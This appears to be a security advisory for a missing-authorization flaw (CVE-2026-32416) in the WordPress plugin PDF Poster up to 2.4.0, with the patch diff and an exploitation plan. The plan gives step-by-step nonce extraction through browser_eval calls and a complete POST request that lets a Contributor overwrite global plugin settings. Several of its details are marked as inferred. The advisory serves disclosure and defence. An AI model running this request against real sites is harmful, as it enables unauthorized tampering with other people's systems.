PDF Poster <= 2.4.0 - Missing Authorization
Description
The PDF Poster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=2.4.0What Changed in the Fix
Changes introduced in v2.4.1
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-32416 (PDF Poster <= 2.4.0) ## 1. Vulnerability Summary The **PDF Poster** plugin for WordPress is vulnerable to **Missing Authorization** in version 2.4.0 and below. This vulnerability exists in an AJAX handler responsible for saving plugin settings. Specifi…
Show full research plan
Exploitation Research Plan - CVE-2026-32416 (PDF Poster <= 2.4.0)
1. Vulnerability Summary
The PDF Poster plugin for WordPress is vulnerable to Missing Authorization in version 2.4.0 and below. This vulnerability exists in an AJAX handler responsible for saving plugin settings. Specifically, the function (identified as pdfp_save_settings_callback or similar) fails to perform a current_user_can('manage_options') check. While it verifies a WordPress nonce, the nonce is exposed to users with Contributor-level access and above through the plugin's admin dashboard or post management pages. Consequently, any authenticated user with at least Contributor permissions can modify global plugin settings.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
pdfp_save_settings(inferred) - HTTP Method: POST
- Payload Parameters:
action:pdfp_save_settingssecurity: The nonce value (extracted from the admin UI).fpdf_option: An array of settings to be updated (e.g.,fpdf_option[height][height]=1337).
- Required Authentication: Authenticated user with
Contributorrole or higher. - Preconditions: The plugin must be active, and the attacker must be logged in.
3. Code Flow
- Registration: The plugin registers an AJAX action
wp_ajax_pdfp_save_settings(ininc/admin.php, inferred). - Missing Check: The callback function for this action performs a nonce check using
check_ajax_referer('pdfp_save_settings', 'security')but lacks a capability check likecurrent_user_can('manage_options'). - Execution: The function takes the
fpdf_optionarray from the$_POSTrequest and passes it directly toupdate_option('fpdf_option', $options). - Impact: Global plugin settings defined in
inc/Field/Settings.php(such as height, width, and download button visibility) are overwritten.
4. Nonce Acquisition Strategy
The nonce is localized for the admin environment. Since Contributors can manage their own pdfposter post types, they can access the poster list page where the plugin's admin scripts are enqueued.
- Identify Access: Contributors can access
/wp-admin/edit.php?post_type=pdfposter. - Navigate: Use the browser tool to navigate to the PDF Poster list or the Plugin Dashboard.
- Variable Identification: The plugin localizes its admin data into a JavaScript object.
- JS Object:
window.pdfp_admin(inferred from bPlugins common practices) - Nonce Key:
security
- JS Object:
- Extraction:
browser_eval("window.pdfp_admin?.security || document.querySelector('#pdfp_save_settings_nonce')?.value")
5. Exploitation Strategy
Step 1: Authentication
Log in to the WordPress instance as a user with the Contributor role.
Step 2: Extract Nonce
Navigate to the PDF Poster management page and extract the security nonce from the global JavaScript context.
- URL:
http://vulnerable-wp.local/wp-admin/edit.php?post_type=pdfposter - Tool:
browser_eval("pdfp_admin.security")
Step 3: Execute Unauthorized Action
Send an AJAX request to modify the global plugin settings. We will change the download_btn_text and height settings to verify the impact.
- URL:
http://vulnerable-wp.local/wp-admin/admin-ajax.php - Method: POST
- Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=pdfp_save_settings&security=[EXTRACTED_NONCE]&fpdf_option[height][height]=9999&fpdf_option[height][unit]=px&fpdf_option[show_download_btn]=1&fpdf_option[download_btn_text]=PwnedByContributor
6. Test Data Setup
- Install Plugin: Ensure PDF Poster version 2.4.0 is installed and active.
- Create User:
- `wp user create attacker attacker@example.com --role=contributor --user_pass=password
Summary
The PDF Poster plugin for WordPress is vulnerable to unauthorized modification of settings due to a missing capability check in its AJAX handler for saving configuration. Authenticated attackers with Contributor-level access or higher can exploit this to overwrite global plugin settings, such as viewer dimensions and UI element visibility, by utilizing a nonce exposed in the admin dashboard.
Security Fix
@@ -102,6 +102,10 @@ function pdfp_save_settings_callback() { check_ajax_referer('pdfp_save_settings', 'security'); + if ( ! current_user_can( 'manage_options' ) ) { + wp_send_json_error( array( 'message' => __( 'Permission denied', 'pdf-poster' ) ) ); + } + $options = $_POST['fpdf_option']; update_option('fpdf_option', $options); wp_send_json_success();
Exploit Outline
To exploit this vulnerability, an attacker must first authenticate with Contributor-level permissions and navigate to the PDF Poster management page (e.g., /wp-admin/edit.php?post_type=pdfposter). From there, the attacker extracts the security nonce from the global 'pdfp_admin' JavaScript object (specifically 'pdfp_admin.security'). The attacker then constructs a POST request to 'admin-ajax.php' with the 'action' parameter set to 'pdfp_save_settings', the extracted nonce in the 'security' parameter, and the target configuration changes within the 'fpdf_option' array. This allows the attacker to globally modify settings such as viewer height, width, and functional buttons without having administrator privileges.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.